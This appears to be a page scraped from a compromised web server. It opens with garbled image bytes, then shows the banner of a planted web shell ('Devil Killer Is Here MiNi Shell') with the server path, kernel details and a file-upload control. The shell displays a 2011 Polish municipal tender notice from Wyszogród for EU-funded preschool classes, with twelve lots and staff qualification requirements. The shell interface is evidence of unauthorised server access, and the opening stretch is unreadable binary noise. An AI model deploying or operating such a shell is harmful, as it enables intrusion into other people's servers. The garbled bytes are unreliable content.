JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111214/427042-N-2011.html

<p class="kh_header"><b>Wyszogród: Świadczenie usług edukacyjnych - przedszkolnych polegających na prowadzeniu zajęć w ramach projektu  Przedszkole szansą na wszechstronny rozwój współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty.</b><br>
<b>Numer ogłoszenia: 427042 - 2011; data zamieszczenia: 14.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy i Miasta Wyszogród , ul. Rębowska 37, 09-450 Wyszogród, woj. mazowieckie, tel. 024 2311020, faks 024 2311024.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług edukacyjnych - przedszkolnych polegających na prowadzeniu zajęć w ramach projektu  Przedszkole szansą na wszechstronny rozwój współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług edukacyjnych  przedszkolnych polegających na prowadzeniu zajęć w ramach projektu Przedszkole szansą na wszechstronny rozwój współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty.
2. Temat usług edukacyjnych - przedszkolnych:
Część 1  zajęcia rozwijające kompetencje indywidualne - zajęcia teatralne -instruktor.
Część 2  zajęcia rozwijające kompetencje indywidualne - zajęcia teatralne - nauczyciel.
Część 3  zajęcia rozwijające kompetencje indywidualne - zajęcia plastyczne - instruktor.
Część 4  zajęcia rozwijające kompetencje indywidualne - zajęcia plastyczne - nauczyciel.  
Część 5  zajęcia rozwijające kompetencje indywidualne - zajęcia taneczne  - instruktor.
Część 6 zajęcia rozwijające kompetencje indywidualne  - zajęcia taneczne -  nauczyciel.
Część 7  zajęcia rozwijające kompetencje indywidualne  - zajęcia z lektorem języka niemieckiego Zabawa z językiem niemieckim. 
Część 8  zajęcia rozwijające kompetencje indywidualne - zajęcia opiekuńczo-wychowawcze z nauczycielem w wydłużonym czasie pracy przedszkola.
Część 9  zajęcia specjalistyczne - zajęcia z logopedą.  
Część 10  zajęcia specjalistyczne z psychologiem. 
Część 11  zajęcia specjalistyczne z gimnastyki korekcyjnej.
Część 12  koordynacja realizowanych w ramach projektu zajęć specjalistycznych
i rozwijających kompetencje indywidualne - animator projektu.
Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek dysponowania osobami zdolnymi do Część 1 - zajęcia rozwijające kompetencje indywidualne - zajęcia teatralne -instruktor.
Co najmniej jedną osobę która posiada:
-	wykształcenie wyższe pedagogiczne, 
-	certyfikat instruktora teatralnego, 
-	doświadczenie zawodowe w  realizacji przedsięwzięć  teatralnych  z udziałem dzieci  w wieku przedszkolnym,
-	doświadczenie w realizacji programów własnych (autorskich),
-	dodatkowe kursy, warsztaty, studia podnoszące kwalifikacje zawodowe,
-	posiadanie przygotowania pedagogicznego, 

Część 2 - zajęcia rozwijające kompetencje indywidualne - zajęcia teatralne - nauczyciel.
Co najmniej jedną osobę która posiada:
-	wykształcenie wyższe  edukacja wczesnoszkolna-nauczanie zintegrowane z  edukacją przedszkolną, 
-	posiadanie przygotowania pedagogicznego, 
-	doświadczenie zawodowe  jako nauczyciel wychowania przedszkolnego, 
-	doświadczenie w realizacji programów własnych (autorskich),
-	dodatkowe kursy, warsztaty podnoszące kwalifikacje  zawodowe.

Część 3 - zajęcia rozwijające kompetencje indywidualne - zajęcia plastyczne - instruktor.
Co najmniej jedną osobę która posiada:
-	wykształcenie wyższe plastyczne,
-	posiadanie przygotowania pedagogicznego, 
-	doświadczenie zawodowe w  realizacji projektów plastycznych z udziałem dzieci  w wieku przedszkolnym,
-	doświadczenie w realizacji programów własnych (autorskich), pożądane uprawnienia instruktora,
-	dodatkowe kursy,  warsztaty podnoszące kwalifikacje zawodowe.

Część 4 - zajęcia rozwijające kompetencje indywidualne - zajęcia plastyczne - nauczyciel.  
Co najmniej jedną osobę która posiada:
-	wykształcenie wyższe  edukacja wczesnoszkolna-nauczanie zintegrowane z edukacją przedszkolną, 
-	posiadanie przygotowania pedagogicznego, 
-	doświadczenie zawodowe  jako nauczyciel wychowania przedszkolnego,
-	doświadczenie w realizacji programów własnych (autorskich),
-	dodatkowe kursy, warsztaty podnoszące kwalifikacje zawodowe i w zakresie  różnych technik plastycznych  w   przedszkolu.

Część 5 - zajęcia rozwijające kompetencje indywidualne - zajęcia taneczne  - instruktor.
Co najmniej jedną osobę która posiada:
-	wykształcenie wyższe pedagogiczne lub podyplomowe studia form gimnastyczno-tanecznych z rytmiką,
-	posiadanie przygotowania pedagogicznego, 
-	doświadczenie zawodowe w  realizacji przedsięwzięć  tanecznych  z udziałem dzieci  w wieku przedszkolnym,
-	doświadczenie w realizacji programów własnych (autorskich),
-	dodatkowe kursy, warsztaty, studia podnoszące kwalifikacje zawodowe.

Część 6 - zajęcia rozwijające kompetencje indywidualne  - zajęcia taneczne -  nauczyciel.
Co najmniej jedną osobę która posiada:
-	wykształcenie wyższe  edukacja wczesnoszkolna-nauczanie zintegrowane z edukacją przedszkolną  lub studium nauczycielskie wychowanie przedszkolne, 
-	posiadanie przygotowania pedagogicznego, 
-	doświadczenie zawodowe  jako nauczyciel wychowania przedszkolnego, 
-	doświadczenie w realizacji programów własnych (autorskich),
-	dodatkowe  warsztaty, kursy podnoszące kwalifikacje  zawodowe.

Część 7 - zajęcia rozwijające kompetencje indywidualne  - zajęcia z lektorem języka niemieckiego Zabawa z językiem niemieckim. 
Co najmniej jedną osobę która posiada:
-	wykształcenie wyższe: pedagogika wczesnoszkolna z językiem niemieckim lub-wyższe magisterskie - germanistyka,
-	posiadanie przygotowania pedagogicznego, 
-	 doświadczenie zawodowe w  realizacji  zajęć  językowych  z udziałem dzieci  w wieku przedszkolnym,
-	doświadczenie w realizacji programów własnych (autorskich),
-	dodatkowe kursy, warsztaty, studia podnoszące kwalifikacje zawodowe.



Część 8 - zajęcia rozwijające kompetencje indywidualne - zajęcia opiekuńczo-wychowawcze z nauczycielem w wydłużonym czasie pracy przedszkola.
Co najmniej jedną osobę która posiada:
-	wykształcenie wyższe  edukacja wczesnoszkolna   z edukacją przedszkolną, 
-	posiadanie przygotowania pedagogicznego, 
-	doświadczenie zawodowe  jako nauczyciel wychowania przedszkolnego,
-	dodatkowe kursy, warsztaty podnoszące kwalifikacje  zawodowe. 

Część 9 - zajęcia specjalistyczne - zajęcia z logopedą.  
Co najmniej jedną osobę która posiada:
-	wykształcenie wyższe magisterskie oraz studia  podyplomowe w zakresie pedagogiki korekcyjno-kompensacyjnej i logopedii, 
-	posiadanie przygotowania pedagogicznego, 
-	doświadczenie zawodowe w pracy z dziećmi  w wieku przedszkolnym w zakresie terapii logopedycznej, 
-	doświadczenie w pracy z dziećmi z deficytami rozwojowymi, w tym z  uszkodzeniami słuchu, 
-	doświadczenie w realizacji programów własnych (autorskich),
-	dodatkowe kursy, warsztaty podnoszące kwalifikacje zawodowe  w zakresie  wspierania prawidłowego rozwoju mowy dzieci w wieku przedszkolnym.

Część 10 - zajęcia specjalistyczne z psychologiem. 
Co najmniej jedną osobę która posiada:
-	wykształcenie wyższe  psychologiczne,
-	posiadanie przygotowania pedagogicznego, 
-	doświadczenie zawodowe jako psycholog w pracy z dziećmi i osobami dorosłymi,
-	doświadczenie w realizacji programów własnych (autorskich),
-	dodatkowe kursy, warsztaty podnoszące kwalifikacje  zawodowe. 

Część 11 - zajęcia specjalistyczne z gimnastyki korekcyjnej.
Co najmniej jedną osobę która posiada:
-	wykształcenie wyższe  pedagogika terapeutyczna  z rehabilitacją ruchową,
-	posiadanie przygotowania pedagogicznego, 
-	doświadczenie zawodowe w  realizacji  zajęć  gimnastyki korekcyjnej  z udziałem dzieci  w wieku przedszkolnym,
-	doświadczenie w realizacji programów własnych (autorskich),
-	 kurs instruktorski  w zakresie gimnastyki korekcyjnej, 
-	dodatkowe kursy, warsztaty podnoszące kwalifikacje  zawodowe. 


Część 12 - koordynacja realizowanych w ramach projektu zajęć specjalistycznych
i rozwijających kompetencje indywidualne - animator projektu.
Co najmniej jedną osobę która posiada:
-	wykształcenie wyższe  magisterskie pedagogika wieku dziecięcego,
-	posiadanie przygotowania pedagogicznego, 
-	doświadczenie zawodowe w zarządzaniu zespołami ludzkimi,  
-	doświadczenie zawodowe  jako nauczyciel wychowania przedszkolnego, 
-	doświadczenie w realizacji programów własnych (autorskich),
-	doświadczenie w realizacji projektu współfinansowanego ze środków Unii Europejskiej, 
-	dodatkowe kursy, warsztaty podnoszące kwalifikacje,
-	studia podyplomowe ,
-	odbyte szkolenie z zakresu aplikowania o pozyskiwanie środków unijnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty wykonawca ma załączyć również:
a.	  list motywacyjny; 
b.	Curriculum Vitae - dokument winien zawierać zapis: Wyrażam zgodę na 
        przetwarzanie moich danych osobowych zawartych w ofercie dla potrzeb 
        niezbędnych do realizacji projektu zgodnie z ustawą z dnia 29 sierpnia 1997 r. 
        o ochronie danych  osobowych (Dz. U. z 2002 r. Nr 133, poz. 883 z późn. zm.)
c.	 kserokopia dyplomów potwierdzających wykształcenie;
d.	 oryginał kwestionariusza osobowego;
e.	 dokumenty potwierdzające odpowiedni staż pracy;
f.           dokumenty potwierdzające dodatkowe kwalifikacje;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie zawodowe - 30</li>
<li>3 - Dodatkowe kwalifikacje zawodowe - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany mogą dotyczyć;
           - siły wyższej,
          - zawieszenie przez Zamawiającego zawieszeniem realizacji projektu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugim.wyszogrod.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GiM Wyszogrod/Przedszkole Samorządowe w Wyszogrodzie, ul. Niepodległości 7A, 09-450 Wyszogród.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.12.2011 godzina 08:30, miejsce: GiM Wyszogród
Przedszkole Samorządowe w Wyszogrodzie
ul. Niepodległości 7A, 09-450 Wyszogród.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zajęcia rozwijające kompetencje indywidualne - zajęcia teatralne -instruktor..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość grup - 1 grupa x 60 h w latach szkolnych 2011/2012, 2012/2013, zajęcia realizowane w godzinach od 13.00 do 18.00 zgodnie z opracowanym harmonogramem.
  Do zakresu obowiązków wykonawcy należy:
-	Zapoznanie się z celami szczegółowymi realizowanego projektu,
-	Opracowanie programu realizacji zajęć,
-	Współpraca  z kierownikiem projektu i animatorem projektu,
-	Współpraca z nauczycielem  realizującym wspólnie  zajęcia  w ramach projektu,
-	Współpraca z zespołem projektowym w zakresie przygotowywania harmonogramów  zajęć  dodatkowych, 
-	Dzielenie się wiedzą i umiejętnościami za zakresu prowadzonych zajęć z nauczycielem wspomagającym,
-	Uczestniczenie w ewaluacji projektu,
-	Bieżące informowanie rodziców o postępach  dziecka,
-	Dbałość o powierzone pomoce dydaktyczne  do prowadzenia zajęć,
-	Przygotowanie dwukrotnego podsumowania zajęć w postaci przedstawienia teatralnego.
-	Przestrzeganie zasad bezpieczeństwa i higieny (BHP) obowiązujących na terenie przedszkola..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie zawodowe - 30</li>
<li>3. Dodatkowe kwalifikacje zawodowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zajęcia rozwijające kompetencje indywidualne - zajęcia teatralne - nauczyciel..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość grup - 1 grupa x 120 h w latach szkolnych 2011/2012, 2012/2013, zajęcia realizowane w godzinach od 13.00 do 18.00 zgodnie z opracowanym harmonogramem.
      Do zakresu obowiązków wykonawcy należy:
-Zapoznanie się z celami szczegółowymi realizowanego projektu,
-Współpraca  z kierownikiem projektu i animatorem projektu,
-Współpraca z instruktorem  realizującym wspólnie  zajęcia  w ramach projektu,
-Współpraca z zespołem projektowym w zakresie przygotowywania harmonogramów  zajęć  dodatkowych, 
-Prowadzenie dokumentacji (dziennik zajęć) realizowanych zajęć  zgodnie z wytycznymi zawartymi w projekcie,
-Uczestniczenie w ewaluacji projektu,
-Dbałość o powierzone pomoce dydaktyczne  do prowadzenia zajęć,
-Przygotowanie sal i pomocy dydaktycznych do zajęć projektowych,
-Porządkowanie sal po odbytych zajęciach,
-Przestrzeganie zasad bezpieczeństwa i higieny (BHP) obowiązujących na terenie przedszkola..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zajęcia rozwijające kompetencje indywidualne - zajęcia plastyczne - instruktor..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość grup - 1 grupa x 60 h w latach szkolnych 2011/2012, 2012/2013, zajęcia realizowane w godzinach od 13.00 do 18.00 zgodnie z opracowanym harmonogramem
Do zakresu obowiązków wykonawcy należy:
-	Zapoznanie się z celami szczegółowymi realizowanego projektu,
-	Opracowanie programu realizacji zajęć,
-	Współpraca  z kierownikiem projektu i animatorem projektu,
-	Współpraca z nauczycielem  realizującym wspólnie  zajęcia  w ramach projektu,
-	Współpraca z zespołem projektowym w zakresie przygotowywania harmonogramów  zajęć  dodatkowych, 
-	Dzielenie się wiedzą i umiejętnościami za zakresu prowadzonych zajęć z nauczycielem wspomagającym,
-	Uczestniczenie w ewaluacji projektu,
-	Bieżące informowanie rodziców o postępach  dziecka,
-	Dbałość o powierzone pomoce dydaktyczne  do prowadzenia zajęć,
-	Przygotowanie dwukrotnego podsumowania zajęć w postaci wystawy prac plastycznych,
-	Przestrzeganie zasad bezpieczeństwa i higieny (BHP) obowiązujących na terenie przedszkola..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie zawodowe - 30</li>
<li>3. Dodatkowe kwalifikacje zawodowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zajęcia rozwijające kompetencje indywidualne - zajęcia plastyczne - nauczyciel..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość grup - 1 grupa x 120 h w latach szkolnych 2011/2012, 2012/2013, zajęcia realizowane w godzinach od 13.00 do 18.00 zgodnie z opracowanym harmonogramem
     Do zakresu obowiązków wykonawcy należy:
-	Zapoznanie się z celami szczegółowymi realizowanego projektu,
-	Współpraca  z kierownikiem projektu i animatorem projektu,
